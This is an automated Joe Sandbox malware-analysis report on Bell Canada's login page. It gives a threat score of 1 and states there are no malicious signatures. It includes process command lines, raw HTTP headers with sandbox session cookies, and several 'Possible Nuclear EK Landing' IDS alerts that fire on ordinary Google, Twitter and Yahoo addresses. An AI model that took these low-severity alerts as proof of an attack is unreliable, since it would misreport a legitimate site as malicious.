Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://mybell.bell.ca/Login?language=en

Overview

General Information

Sample URL:https://mybell.bell.ca/Login?language=en
Analysis ID:1546108
Infos:

Detection

Score:1
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 7068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 3100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4184 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 4980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • chrome.exe (PID: 1424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mybell.bell.ca/Login?language=en" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 616 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://m.bell.ca/getapploginpage MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 --field-trial-handle=1064,i,6441221849923588881,12403408043935428112,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://m.bell.ca/supportrqcode MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1616 --field-trial-handle=2012,i,16209123222516514220,5828609412293976285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-31T14:12:20.787841+010020221121Exploit Kit Activity Detected192.168.2.95002687.248.119.252443TCP
2024-10-31T14:12:23.152546+010020221121Exploit Kit Activity Detected192.168.2.95005787.248.119.251443TCP
2024-10-31T14:12:47.422706+010020221121Exploit Kit Activity Detected192.168.2.950346142.250.185.174443TCP
2024-10-31T14:13:10.734140+010020221121Exploit Kit Activity Detected192.168.2.950651104.244.42.3443TCP
2024-10-31T14:13:10.763044+010020221121Exploit Kit Activity Detected192.168.2.950652172.66.0.227443TCP

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://mybell.bell.ca/Login?language=enHTTP Parser: Iframe src: https://bellca.demdex.net/dest5.html?d_nsid=0#https%3A%2F%2Fmybell.bell.ca
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: Iframe src: https://bellca.demdex.net/dest5.html?d_nsid=0#https%3A%2F%2Fmybell.bell.ca
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: Iframe src: https://bellca.demdex.net/dest5.html?d_nsid=0#https%3A%2F%2Fmybell.bell.ca
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: Iframe src: https://bellca.demdex.net/dest5.html?d_nsid=0#https%3A%2F%2Fmybell.bell.ca
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: Iframe src: https://bellca.demdex.net/dest5.html?d_nsid=0#https%3A%2F%2Fmybell.bell.ca
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: <input type="password" .../> found
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: <input type="password" .../> found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No favicon
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No favicon
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No favicon
Source: https://support.bell.ca/Billing-and-Accounts/manage_your_bell_services_on_the_go#EXT=MOB_URL_branch_getapploginpage_012423_MHHTTP Parser: No favicon
Source: https://support.bell.ca/Billing-and-Accounts/manage_your_bell_services_on_the_go#EXT=MOB_URL_branch_getapploginpage_012423_MHHTTP Parser: No favicon
Source: https://support.bell.ca/Billing-and-Accounts/manage_your_bell_services_on_the_go#EXT=MOB_URL_branch_getapploginpage_012423_MHHTTP Parser: No favicon
Source: https://support.bell.ca/Billing-and-Accounts/manage_your_bell_services_on_the_go#EXT=MOB_URL_branch_getapploginpage_012423_MHHTTP Parser: No favicon
Source: https://support.bell.ca/Billing-and-Accounts/manage_your_bell_services_on_the_go#EXT=MOB_URL_branch_getapploginpage_012423_MHHTTP Parser: No favicon
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: No favicon
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: No favicon
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: No <meta name="author".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="copyright".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="copyright".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="copyright".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="copyright".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="copyright".. found
Source: https://mybell.bell.ca/Login?language=enHTTP Parser: No <meta name="copyright".. found
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: No <meta name="copyright".. found
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: No <meta name="copyright".. found
Source: https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3D#EXT=branch_supportrqcodeHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49787 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50262 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50470 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50472 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50473 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50474 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50497 version: TLS 1.2
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.9:50026 -> 87.248.119.252:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.9:50057 -> 87.248.119.251:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.9:50346 -> 142.250.185.174:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.9:50651 -> 104.244.42.3:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.9:50652 -> 172.66.0.227:443
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /Login?language=en HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static/bell_common.js?cache HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba43; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; TLP02ce4a58=028702b9c9eb9d45fa93071ef814195a8dde49c75485a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e117b7c25e5473c6b8c7698691dc7ec76a81; TLP409c8162028=08e8c5f15aab2000b6d5af39e455c3dba139d8d53047ea78592ce399b79fe3838682a55060682f3c0814d2c87c113000eba996927cc9b33213252a01388c1491d9327dcd5d217f56d8302374cd353da244286fb3225f8c67d750ec72fed0eaec
Source: global trafficHTTP traffic detected: GET /static/bell_common.js?async HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba43; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; TLP02ce4a58=028702b9c9eb9d45fa93071ef814195a8dde49c75485a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e117b7c25e5473c6b8c7698691dc7ec76a81; TLP409c8162028=08e8c5f15aab2000b6d5af39e455c3dba139d8d53047ea78592ce399b79fe3838682a55060682f3c0814d2c87c113000eba996927cc9b33213252a01388c1491d9327dcd5d217f56d8302374cd353da244286fb3225f8c67d750ec72fed0eaec
